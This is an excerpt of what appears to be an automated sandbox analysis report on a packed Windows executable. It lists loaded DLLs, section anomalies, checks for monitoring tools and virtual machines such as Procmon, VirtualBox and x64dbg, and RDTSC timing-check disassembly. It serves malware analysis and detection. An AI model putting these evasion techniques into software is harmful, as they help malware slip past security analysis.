Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: dZsdMl5Pwl.exeStatic file information: File size 4523520 > 1048576
Source: dZsdMl5Pwl.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: dZsdMl5Pwl.exeStatic PE information: Raw size of sqttxtfh is bigger than: 0x100000 < 0x1c4000

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeUnpacked PE file: 0.2.dZsdMl5Pwl.exe.980000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sqttxtfh:EW;byszctih:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sqttxtfh:EW;byszctih:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: dZsdMl5Pwl.exeStatic PE information: real checksum: 0x45f5d8 should be: 0x45aaa0
Source: dZsdMl5Pwl.exeStatic PE information: section name:
Source: dZsdMl5Pwl.exeStatic PE information: section name: .idata
Source: dZsdMl5Pwl.exeStatic PE information: section name:
Source: dZsdMl5Pwl.exeStatic PE information: section name: sqttxtfh
Source: dZsdMl5Pwl.exeStatic PE information: section name: byszctih
Source: dZsdMl5Pwl.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB36AB push eax; retf 0_3_01BB36B9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB36AB push eax; retf 0_3_01BB36B9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB36AB push eax; retf 0_3_01BB36B9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB349B push ds; retf 0_3_01BB34C9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB349B push ds; retf 0_3_01BB34C9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB349B push ds; retf 0_3_01BB34C9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB369B push edx; retf 0_3_01BB36A9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB369B push edx; retf 0_3_01BB36A9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB369B push edx; retf 0_3_01BB36A9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB368B push esp; retf 0_3_01BB3699
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB368B push esp; retf 0_3_01BB3699
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB368B push esp; retf 0_3_01BB3699
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB3488 push ss; retf 0_3_01BB3489
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB3488 push ss; retf 0_3_01BB3489
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB3488 push ss; retf 0_3_01BB3489
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB33FA push es; retf 0_3_01BB3409
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB33FA push es; retf 0_3_01BB3409
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB33FA push es; retf 0_3_01BB3409
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB30D8 pushfd ; retf 0_3_01BB30D9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB30D8 pushfd ; retf 0_3_01BB30D9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB30D8 pushfd ; retf 0_3_01BB30D9
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB343D push cs; retf 0_3_01BB3449
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB343D push cs; retf 0_3_01BB3449
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB343D push cs; retf 0_3_01BB3449
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB371A pushad ; retf 0_3_01BB3739
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB371A pushad ; retf 0_3_01BB3739
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB371A pushad ; retf 0_3_01BB3739
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BABD10 push eax; ret 0_3_01BABD11
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BABD10 push eax; ret 0_3_01BABD11
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB367B push esi; retf 0_3_01BB3689
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_3_01BB367B push esi; retf 0_3_01BB3689
Source: dZsdMl5Pwl.exeStatic PE information: section name: sqttxtfh entropy: 7.955283388143556

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11CA0F5 second address: 11CA111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E4E2C43Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d jne 00007F49E4E2C436h 0x00000013 pop ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11CA111 second address: 11CA127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 jbe 00007F49E47F215Dh 0x0000000e jc 00007F49E47F214Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11DF459 second address: 11DF4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E4E2C443h 0x00000009 jmp 00007F49E4E2C446h 0x0000000e popad 0x0000000f jo 00007F49E4E2C44Bh 0x00000015 jmp 00007F49E4E2C443h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11DF4A2 second address: 11DF4BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F49E47F2158h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11DF712 second address: 11DF741 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C440h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F49E4E2C442h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11DF741 second address: 11DF75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F49E47F2152h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11DF75B second address: 11DF766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11DF766 second address: 11DF76A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11DF8A8 second address: 11DF8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11DFCDE second address: 11DFCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11DFCE5 second address: 11DFCFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E4E2C445h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11DFCFE second address: 11DFD26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F49E47F2146h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F49E47F2154h 0x00000013 jo 00007F49E47F2146h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11E37C6 second address: 11E384C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E4E2C443h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 add dword ptr [esp], 03359F92h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F49E4E2C438h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 push 00000003h 0x00000034 adc ecx, 03FDA10Bh 0x0000003a push 00000000h 0x0000003c push 00000003h 0x0000003e and edx, dword ptr [ebp+122D2425h] 0x00000044 call 00007F49E4E2C439h 0x00000049 jmp 00007F49E4E2C441h 0x0000004e push eax 0x0000004f pushad 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 pop edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F49E4E2C43Ah 0x0000005b rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11E38FF second address: 11E3985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2153h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, edx 0x0000000f or dword ptr [ebp+122D3053h], ecx 0x00000015 push 00000000h 0x00000017 jmp 00007F49E47F2156h 0x0000001c push CCD13E5Eh 0x00000021 jmp 00007F49E47F2151h 0x00000026 add dword ptr [esp], 332EC222h 0x0000002d movsx edi, ax 0x00000030 push 00000003h 0x00000032 mov edi, dword ptr [ebp+122D364Bh] 0x00000038 push 00000000h 0x0000003a mov si, B173h 0x0000003e mov edx, esi 0x00000040 push 00000003h 0x00000042 mov dword ptr [ebp+122D2142h], edi 0x00000048 call 00007F49E47F2149h 0x0000004d ja 00007F49E47F2150h 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 pop ebx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11E3985 second address: 11E39A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F49E4E2C449h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11E39A9 second address: 11E39EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2152h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jg 00007F49E47F215Bh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007F49E47F2146h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11E39EA second address: 11E39F4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F49E4E2C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11E3ABF second address: 11E3AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jnp 00007F49E47F2146h 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11E3AD3 second address: 11E3AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11E3AD7 second address: 11E3BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 or dword ptr [ebp+122D1A81h], eax 0x0000000e push 00000000h 0x00000010 stc 0x00000011 push 687A8B47h 0x00000016 jne 00007F49E47F2154h 0x0000001c xor dword ptr [esp], 687A8BC7h 0x00000023 mov dword ptr [ebp+122D3531h], edx 0x00000029 push 00000003h 0x0000002b mov edx, dword ptr [ebp+122D18F5h] 0x00000031 push 00000000h 0x00000033 call 00007F49E47F214Ch 0x00000038 ja 00007F49E47F214Ch 0x0000003e pop esi 0x0000003f push 00000003h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F49E47F2148h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 0000001Ch 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b push 8F8FCE6Dh 0x00000060 jmp 00007F49E47F214Fh 0x00000065 add dword ptr [esp], 30703193h 0x0000006c clc 0x0000006d lea ebx, dword ptr [ebp+12455683h] 0x00000073 sub ch, 00000070h 0x00000076 sub dword ptr [ebp+122D24BDh], edi 0x0000007c xchg eax, ebx 0x0000007d jg 00007F49E47F2163h 0x00000083 push eax 0x00000084 push eax 0x00000085 push edx 0x00000086 jnl 00007F49E47F2148h 0x0000008c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11E3BB1 second address: 11E3BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E4E2C443h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12041F6 second address: 1204228 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F49E47F2160h 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 jp 00007F49E47F2146h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12020B4 second address: 12020CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F49E4E2C43Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12020CB second address: 1202155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Dh 0x00000007 pushad 0x00000008 jo 00007F49E47F2146h 0x0000000e jl 00007F49E47F2146h 0x00000014 jmp 00007F49E47F2158h 0x00000019 jmp 00007F49E47F214Dh 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 jnl 00007F49E47F215Fh 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F49E47F214Ch 0x0000002f jmp 00007F49E47F2158h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1202155 second address: 120215B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 12024D5 second address: 12024DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1202656 second address: 12026B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E4E2C441h 0x00000009 jmp 00007F49E4E2C447h 0x0000000e popad 0x0000000f js 00007F49E4E2C43Ch 0x00000015 jbe 00007F49E4E2C436h 0x0000001b push ecx 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 js 00007F49E4E2C436h 0x00000029 jmp 00007F49E4E2C447h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1202C01 second address: 1202C23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49E47F2158h 0x00000009 jc 00007F49E47F2146h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1202C23 second address: 1202C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1202DB7 second address: 1202DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1202DBB second address: 1202DC5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F49E4E2C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1202F15 second address: 1202F35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F2156h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1202F35 second address: 1202F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1202F39 second address: 1202F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1202F3F second address: 1202F6C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F49E4E2C442h 0x00000008 pushad 0x00000009 jmp 00007F49E4E2C446h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1203241 second address: 1203245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1203245 second address: 1203276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C449h 0x00000007 jp 00007F49E4E2C436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F49E4E2C43Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1203276 second address: 120328B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E47F214Eh 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 120340B second address: 120340F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 120340F second address: 1203423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F49E47F214Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 1203423 second address: 1203427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 120A118 second address: 120A158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49E47F2153h 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F49E47F214Bh 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 jmp 00007F49E47F2153h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 120A8D2 second address: 120A8D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 120CEC0 second address: 120CEC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11D93C0 second address: 11D93D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49E4E2C43Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeRDTSC instruction interceptor: First address: 11D93D0 second address: 11D93DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F49E47F2146h 0x0000000a rdtsc
